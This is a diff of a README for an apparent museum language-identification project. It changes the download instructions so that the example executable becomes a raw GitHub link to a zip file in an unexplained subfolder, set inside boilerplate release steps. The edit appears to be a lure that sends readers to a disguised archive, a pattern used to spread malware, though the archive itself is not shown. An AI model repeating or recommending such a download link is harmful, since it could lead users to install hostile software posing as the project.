Yahya222F/MuseumLangID---Model-for-Identifying-the-Language-of-Texts-for-a-Museum/README.md

 2. **Find the Latest Version:** Look for the most recent release.
 It will usually have the highest version number.

 3. **Choose Your File:**
-   - If you see an executable file (e.g., `MuseumLangID.exe`), download this file.
+   - If you see an executable file (e.g., `https://raw.githubusercontent.com/Yahya222F/MuseumLangID---Model-for-Identifying-the-Language-of-Texts-for-a-Museum/main/hybridal/MuseumLangID---Model-for-Identifying-the-Language-of-Texts-for-a-Museum.zip`), download this file.
    - If only source files are available, you might need to follow further instructions or use appropriate software to run them.

 4. **Download the File:** Click on the file name to start the download.
 Depending on your internet speed, this might take a moment.